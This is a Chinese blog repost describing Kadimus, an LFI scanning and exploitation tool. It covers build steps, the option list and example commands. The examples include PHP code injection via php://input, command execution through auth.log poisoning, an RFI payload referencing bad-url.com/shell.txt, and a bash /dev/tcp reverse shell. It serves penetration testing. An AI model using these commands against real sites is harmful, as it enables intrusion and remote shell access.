Legend‘s BLog
Kadimus是一个用于检测网站本地文件包含(LFI)漏洞的安全工具。
特性
|
1 2 3 4 5 6 7 8 9 |
<span class="pln">检测所有URL参数 /var/log/auth.log RCE /proc/self/environ RCE php://input RCE data://text RCE 源代码泄露检测 多线程扫描 HTTP命令执行漏洞 代理支持 (socks4://, socks4a://, socks5:// ,socks5h:// and http://)</span> |
编译
安装libcurl:
CentOS/Fedora
|
1 2 3 |
<span class="com"># yum install libcurl-devel</span> <span class="typ">Debian</span><span class="pln"> based </span><span class="com"># apt-get install libcurl4-openssl-dev</span> |
安装libpcre:
CentOS/Fedora
|
1 |
<span class="com"># yum install libpcre-devel</span> |
Debian based
|
1 |
<span class="com"># apt-get install libpcre3-dev</span> |
安装libssh:
CentOS/Fedora
|
1 |
<span class="com"># yum install libssh-devel</span> |
基于Debian
|
1 |
<span class="com"># apt-get install libssh-dev</span> |
最后执行
|
1 2 3 |
<span class="pln">$ git clone https</span><span class="pun">://</span><span class="pln">github</span><span class="pun">.</span><span class="pln">com</span><span class="pun">/</span><span class="pln">P0cL4bs</span><span class="pun">/</span><span class="typ">Kadimus</span><span class="pun">.</span><span class="pln">git $ cd </span><span class="typ">Kadimus</span><span class="pln"> $ make</span> |
选项
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
<span class="pln"> -h, --help Display this help menu Request: -B, --cookie STRING Set custom HTTP Cookie header -A, --user-agent STRING User-Agent to send to server --connect-timeout SECONDS Maximum time allowed for connection --retry-times NUMBER number of times to retry if connection fails --proxy STRING Proxy to connect, syntax: protocol://hostname:port Scanner: -u, --url STRING Single URI to scan -U, --url-list FILE File contains URIs to scan -o, --output FILE File to save output results --threads NUMBER Number of threads (2..1000) Explotation: -t, --target STRING Vulnerable Target to exploit --injec-at STRING Parameter name to inject exploit (only need with RCE data and source disclosure) RCE: -X, --rce-technique=TECH LFI to RCE technique to use -C, --code STRING Custom PHP code to execute, with php brackets -c, --cmd STRING Execute system command on vulnerable target system -s, --shell Simple command shell interface through HTTP Request -r, --reverse-shell Try spawn a reverse shell connection. -l, --listen NUMBER port to listen -b, --bind-shell Try connect to a bind-shell -i, --connect-to STRING Ip/Hostname to connect -p, --port NUMBER Port number to connect --ssh-port NUMBER Set the SSH Port to try inject command (Default: 22) --ssh-target STRING Set the SSH Host RCE Available techniques environ Try run PHP Code using /proc/self/environ input Try run PHP Code using php://input auth Try run PHP Code using /var/log/auth.log data Try run PHP Code using data://text Source Disclosure: -G, --get-source Try get the source files using filter:// -f, --filename STRING Set filename to grab source [REQUIRED] -O FILE Set output file (Default: stdout)</span> |
测试示例
扫描:
|
1 2 |
<span class="pln">./kadimus -u localhost/?pg=contact -A my_user_agent ./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0</span> |
获取文件源码:
|
1 |
<span class="pln">./kadimus -t localhost/?pg=contact -G -f "index.php" -O local_output.php --inject-at pg</span> |
执行php代码:
|
1 |
<span class="pln">./kadimus -t localhost/?pg=php://input -C '</span><span class="pun"><?</span><span class="pln">php echo </span><span class="str">"pwned"</span><span class="pun">;</span><span class="pln"> </span><span class="pun">?></span><span class="pln">' -X input</span> |
命令执行:
|
1 |
<span class="pun">./</span><span class="pln">kadimus </span><span class="pun">-</span><span class="pln">t localhost</span><span class="pun">/?</span><span class="pln">pg</span><span class="pun">=/</span><span class="pln">var</span><span class="pun">/</span><span class="pln">log</span><span class="pun">/</span><span class="pln">auth</span><span class="pun">.</span><span class="pln">log </span><span class="pun">-</span><span class="pln">X auth </span><span class="pun">-</span><span class="pln">c </span><span class="str">'ls -lah'</span><span class="pln"> </span><span class="pun">--</span><span class="pln">ssh</span><span class="pun">-</span><span class="pln">target localhost</span> |
检查远程文件包含(RFI)漏洞:
|
1 |
<span class="pun">/*</span><span class="pln"> http</span><span class="pun">://</span><span class="pln">bad</span><span class="pun">-</span><span class="pln">url</span><span class="pun">.</span><span class="pln">com</span><span class="pun">/</span><span class="pln">shell</span><span class="pun">.</span><span class="pln">txt </span><span class="pun">*/</span><span class="pln"> </span><span class="pun"><?</span><span class="pln">php echo base64_decode</span><span class="pun">(</span><span class="str">"c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="</span><span class="pun">);</span><span class="pln"> </span><span class="pun">?></span> |
反弹shell:
|
1 |
<span class="pun">./</span><span class="pln">kadimus </span><span class="pun">-</span><span class="pln">t localhost</span><span class="pun">/?</span><span class="pln">pg</span><span class="pun">=</span><span class="pln">contact</span><span class="pun">.</span><span class="pln">php </span><span class="pun">-</span><span class="typ">Xdata</span><span class="pln"> </span><span class="pun">--</span><span class="pln">inject</span><span class="pun">-</span><span class="pln">at pg </span><span class="pun">-</span><span class="pln">r </span><span class="pun">-</span><span class="pln">l </span><span class="lit">12345</span><span class="pln"> </span><span class="pun">-</span><span class="pln">c </span><span class="str">'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1'</span><span class="pln"> </span><span class="pun">--</span><span class="pln">retry</span><span class="pun">-</span><span class="pln">times </span><span class="lit">0</span> |
[整理/phper,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)]
转载请注明: 转载自Legend‘s BLog
本文链接地址: 本地文件包含(LFI)漏洞检测工具 – Kadimus
未经允许不得转载:Legend‘s BLog » 本地文件包含(LFI)漏洞检测工具 – Kadimus
发表评论